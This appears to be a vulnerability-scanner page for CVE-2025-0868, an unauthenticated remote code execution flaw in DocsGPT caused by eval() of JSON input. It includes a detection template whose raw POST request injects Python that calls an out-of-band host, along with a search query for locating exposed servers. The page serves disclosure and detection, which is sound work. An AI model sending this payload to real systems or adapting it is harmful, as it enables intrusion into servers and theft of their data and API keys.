DocsGPT - Unauthenticated Remote Code Execution
CVE-2025-0868
Verified
Description
A vulnerability, that could result in Remote Code Execution (RCE), has been found in DocsGPT. Due to improper parsing of JSON data using eval() an unauthorized attacker could send arbitrary Python code to be executed via /api/remote endpoint.This issue affects DocsGPT- from 0.8.1 through 0.12.0.
Severity
Critical
Exploit Probability
11%
Published Date
February 25, 2025
Template Author
iamnoooob, rootxharsh, pdresearch
CVE-2025-0868.yaml
id: CVE-2025-0868
info:
name: DocsGPT - Unauthenticated Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
A vulnerability, that could result in Remote Code Execution (RCE), has been found in DocsGPT. Due to improper parsing of JSON data using eval() an unauthorized attacker could send arbitrary Python code to be executed via /api/remote endpoint.This issue affects DocsGPT- from 0.8.1 through 0.12.0.
impact: |
Unauthenticated attackers can execute arbitrary Python code remotely on DocsGPT servers through improper eval() usage, leading to complete system compromise and potential access to all indexed documents and API keys.
remediation: |
Upgrade to DocsGPT version 0.12.1 or later that addresses the eval() vulnerability.
reference:
- https://cert.pl/posts/2025/02/CVE-2025-0868/
- https://cert.pl/en/posts/2025/02/CVE-2025-0868/
- https://github.com/arc53/DocsGPT
classification:
epss-score: 0.11125
epss-percentile: 0.93228
metadata:
verified: true
max-request: 1
fofa-query: body="Welcome to DocsGPT"
tags: cve,cve2025,docsgpt,unauth,rce,vkev,vuln
http:
- raw:
- |
POST /api/remote HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user=1&source=reddit&name=other&data={"source":"reddit","client_id":"1111","client_secret":1111,"user_agent":"111","search_queries":[""],"number_posts":10,"rce\\\\":__import__('requests').get('http://{{interactsh-url}}/')}#":11}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- dns
- type: word
part: body
words:
- '"task_id":'
- '"status":'
condition: and
# digest: 4a0a00473045022100b338ec4ea2333d6ba9414d2b76606cfaec0424a32522742cac9a5242a6fc2702022066e095122d2779d6bc088910cd0a976c2fc74068735b46011424cab267c1d375:922c64590222798bb761d5b6d8e729509.5Severity
CVSS Metrics
Remediation Steps
Upgrade to DocsGPT version 0.12.1 or later that addresses the eval() vulnerability.